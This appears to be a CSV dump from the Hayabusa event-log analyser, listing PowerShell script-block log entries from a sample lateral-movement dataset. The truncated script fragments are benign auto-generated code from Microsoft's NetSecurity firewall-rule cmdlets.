[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and 
(@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } 
if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 
($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') 
} if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 